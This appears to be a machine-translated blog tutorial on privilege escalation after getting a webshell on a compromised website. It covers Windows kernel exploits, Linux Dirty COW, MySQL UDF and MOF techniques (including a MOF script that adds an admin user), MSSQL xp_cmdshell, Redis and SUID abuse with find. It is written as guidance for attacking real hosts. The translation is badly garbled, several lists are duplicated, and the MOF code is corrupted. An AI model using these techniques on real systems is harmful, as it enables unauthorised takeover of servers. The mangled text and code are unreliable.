IMCAFS

Home

summary of lifting power and various using postures

Posted by millikan at 2020-03-24
all

This article is suitable for the friends who are learning to raise the right, or who are preparing to learn to raise the right. The big guy can bypass the comparative basis of writing. I'm also a little white. I'd like to summarize the posture and utilization of the right lifting, and share some methods that I think are easy to use for you. Welcome to help me add. What are the methods that are easy to use for the right lifting can also be shared, and we can make progress together. This article has its own understanding, if there is anything wrong or bad, I hope you don't spray me, but welcome to help me correct.

As the name implies, lifting permissions means lifting permissions. When we get a website from shell, our permissions are very low in most cases (usually just an Apache permission). In this case, in order to "expand the outcome of the war", we need to use the power lifting to let the original low authority (for example, only allowed to list directories) - High Authority (with the ability to modify files), and improve the authority to help us continue to penetrate.

In windows, there are two kinds of local service rights, one is local service rights, such as IIS6 iis5 FTP SMB. The other is the vulnerability of system kernel, such as the relatively popular ms07-010. There is a vulnerability in port 445, and the system vulnerability is used to raise the right. In order to make you more intuitive to see the steps of raising rights, I decided to use the environment of "ah Bao" for testing (as for who is ah Bao, who will not tell you of course), and map it to you. First, we enter the host of getshell, and then execute the 'systeminfo' command to see the basic information of this host, and what other vulnerabilities have not been fixed.

Find out which vulnerabilities can be claimed, check the version number of the target machine (such as whether the host is x64 or x86), and then find out which vulnerabilities can be exploited.

There is usually an EXE script for Windows version to download, but it is not necessarily successful. So we need to build an environment like the target machine, test it first, and then put the program into the target machine for power lifting after the test is successful. Here, I will directly demonstrate the script I tested for power lifting.

Windows local authorization steps:

First of all, get shell. I won't say how to get shell. It must be after get shell. If you see a database, you can guess the password of the database account, then you don't need get shell (but you can't usually guess -). -), we will use the database to raise the right, which will be discussed later. Upload the x64.exe script we tested to the target machine

We can see that it is not system permission before executing this script

Next, we execute the x64.exe script, which is the ms16-032 vulnerability. We can see that the permission has become the system permission and the permission has been raised successfully.

But we should pay attention to a few points, because we use the kitchen knife or ant sword to connect and execute the command is not an interactive shell, as for what is an interactive shell, you can go to Baidu. So when we use scripts, we need to enter commands later to execute them. If it is an interactive shell, for example, with MSF, a dialog box will pop up. As long as the command is executed in this dialog box, no matter what command is executed with system permission. Other scripts can also be lifted. You need to dig them. Of course, we can also use the script generated by MSF to raise the weight. The bounce back of MSF is an interactive shell, which we will talk about later.

Operation mode of windows authorization script (summary):

1. Directly execute the EXE program, and a CMD window will be opened after success. In the new window, the permission is system.

2. Execute the EXE program in webshell in x64.exe whoamI mode. After success, execute the command directly, and then modify the content of the command to execute different commands.

3. Use MSF and other tools.

4. Special, C + + source code, python script, PowerShell script.

1. Directly execute the EXE program, and a CMD window will be opened after success. In the new window, the permission is system.

2. Execute the EXE program in webshell in x64.exe whoamI mode. After success, execute the command directly, and then modify the content of the command to execute different commands.

3. Use MSF and other tools.

4. Special, C + + source code, python script, PowerShell script.

After the Linux system is installed, there are vulnerabilities in its own software or kernel. The popular "dirty cow" can also use VIM or sudo. Linux kernel power lifting is the same as windows. It needs to download the script corresponding to the vulnerability for power lifting, but the downloaded Linux power lifting script needs to be compiled before it can be used. The compilation method is very simple, and we will talk about it later.

Linux local authorization steps:

After the getshell, it is usually the Apache user, then enter the command bar, enter the uname-a command to view the kernel version, and use the kernel version to raise the authority. We still use the environment of "ah Bao" for demonstration. You can see the kernel version for both

If you look at the system version of RedHat series, you can see that it is cento 6.5

Then we need to find the vulnerability of the relevant version, and carry out the power lifting. In order not to crash the system, we need to install the corresponding version of the system, and first test it locally, so as not to crash the target system (I have broken it several times, crash). Generally speaking, the Linux power lifting script is a. C file, so we need GCC in Linux to compile. If the target machine does not have g CC, then we can only build a same environment, and then install GCC to compile, which is usually found in the compilation method script.

We take the tested dirty cow script as an example. First, we upload a dirty cow script, and then compile it

There's an extra script. We need to add a password after the script. If the administrator and we don't know the password, we will not be able to connect. Then the system crashes. I won't say anything about the latter, and we can do it and cherish it.

When we look at the passwd file, we can see that the root user becomes a firepart, and then we can use SSH to connect.

Root will become our dirty cow, and then log in to this user, which can be the administrator's permission. Remember to move the files backed up by dirty cow to the original place, or the administrator will not log in.

0 × 03 database authorization MySQL database authorization

1. Has the root permission of MySQL, and MySQL runs with the system permission.

2. Has permission to execute SQL statements.

1. Has the root permission of MySQL, and MySQL runs with the system permission.

2. Has permission to execute SQL statements.

Mysql database authorization can be divided into:

1. Startup script

2. UDF script

3. MOF script

4. We mainly introduce UDF script authorization for planning tasks, because I personally think this database authorization method is relatively easy to use, but database write permission is required.

1. Startup script

2. UDF script

3. MOF script

4. We mainly introduce UDF script authorization for planning tasks, because I personally think this database authorization method is relatively easy to use, but database write permission is required.

Using mysql, write the back door to the boot entry. At the same time, because it is boot-up and write again, you need to restart the target server to run.

Linux UDF rights

You don't need to judge the version of MySQL. Just look at the path and write the so file directly. The files in Linux are so files and windows files are DLL files.

After we get the shell, we enter the terminal and input whoamI. We find that we are only the Apache user right

We can find the configuration file of the website database, check the account password of the database, and see the account root password root

Log in to MySQL database, and you can enter show variables like '% plugin%' in MySQL to view the plugin path directly

Then we use the hex editing tool to encode the so file, decode it and write it to the directory, return it to true, and write it successfully.

After writing, execute the command to create the function, and a sys? Eval function will be created to execute the system command. All the system commands executed by this function are system permissions.

The sys Eval function can execute system commands. Enter system commands in parentheses

Windows UDF Rights:

UDF can be understood as MySQL function library, which can use UDF defined creation functions. • if you want to use UDF, you must upload udf.dll as the execution Library of UDF. • MySQL supports UDF extension, which enables us to call functions in DLL to realize some special functions. First, export the DLL file, and then judge the MySQL version 5.2, UDF is exported to the system directory C: / Windows / system32 / MySQL version 5.2, and UDF is exported to the installation path MySQL \ lib \ plugin \ in the same way as Linux UDF. It will not be demonstrated. The method is the same as that of Linux UDF

MOF rights (only applicable to Windows system, generally available for lower version system, such as XP, Server2003)

1. First, find a writable directory and upload our MOF file.

2. Execute the following SQL statement, and the command in MOF file will execute.

1. First, find a writable directory and upload our MOF file.

2. Execute the following SQL statement, and the command in MOF file will execute.

We upload the MOF file to C: / wmpub / nullevt.mof, and then copy the file to C: / Windows / sysrtem32 / WBEM / MOF / nullevt.mof

Select load file(‘C:/wmpub/nullevt.mof’)intodumpfile’c:/windows/sysrtem32/wbem/mof/nullevt.mof’

Copy this code to a MOF suffix file

# pragma namespace("\.\root\subion")

instance of EventFilter as $EventFilter{ EventNamespace ="Root\Cimv2"; Name = "filtP2"; Query = "Select * From InstanceModificationEvent "

"Where TargetInstance Isa \"Win32_LocalTime\" "

"And TargetInstance.Second = 5";

QueryLanguage = "WQL";

}

instance of ActiveEventConsumer as $Consumer

{

Name = "consPCSV2";

ingEngine = "J";

Text =

"var WSH = new

ActiveXObject(\"W.Shell\")\nWSH.run(\"net.exe user admin admin /add")";

}

instance of __FilterToConsumerBinding

{

Consumer = $Consumer;

Filter = $EventFilter;

}

Upload the MOF file to the target machine, you can modify the code and execute the command. At present, the method of MOF is less used, because it is more troublesome, so it is recommended to use UDF for MySQL database.

Redis raise power

1. Startup script

2. In general, because it is safe to compile with source code, it runs with root permission by default. You can write any file through unauthorized access to the database and execute commands directly with exp.

3. MOF script

4. Schedule tasks

5. SSH public key

1. Startup script

2. In general, because it is safe to compile with source code, it runs with root permission by default. You can write any file through unauthorized access to the database and execute commands directly with exp.

3. MOF script

4. Schedule tasks

5. SSH public key

The so-called use of database for power lifting is actually the operation authority of the database, so we can carry out power lifting as long as we meet the following conditions: 1. We must obtain the account password of SA or the account password of SA with the same authority, and MSSQL has not been downgraded. 2. You must be able to execute SQL statements in some way, such as a webshell or a connection to port 1433.

MSSQL database rights idea:

1. Startup script

2. Listen on port 1433, get the account number and password of the SA account of MSSQL, execute the command, and use exec xp_cmdshellwhoami.

1. Startup script

2. Listen on port 1433, get the account number and password of the SA account of MSSQL, execute the command, and use exec xp_cmdshellwhoami.

If the MSSQL database runs with administrator privileges, the command execution is administrator privileges.

The steps of getting permissions for MSSQL database: first of all, we need to get the shell or find other vulnerabilities. I see that port 21 of the target machine is open, and we can directly use FTP connection to copy the file and get the account password of the database

Use the database connection tool to connect, and then enter the exec XP? Cmdshell whoamI command. You can see that it is the system permission

0 × 04 third party software rights

In Linux system, there is a suid permission. If a file has s permission, the ordinary user has execution permission. If the ordinary user executes the file, it will execute with the permission of the file owner. First, find the file with s permission, and then find the file that can execute the command. Linux executable files include: nmap, VIM, find, bash, more, less, nano, CP

This command can query the suid file with root permission

Find / -user root -perm -4000 -print2/dev/null

Let's use the find command to demonstrate. First, find the directory of find. You can use the where is command to find the directory. We will add the s permission to find

Create a new user to experiment with

We can see that the authority is the authority of qqq user

You can see that after entering this command, our authority becomes root, and the authority is raised successfully

As for MSF, if I can fill in the next article for you, if there is something bad to write, I hope you don't spray me, and the code is very tired, but welcome to correct me and learn together. This is our original intention. Thank you for reading.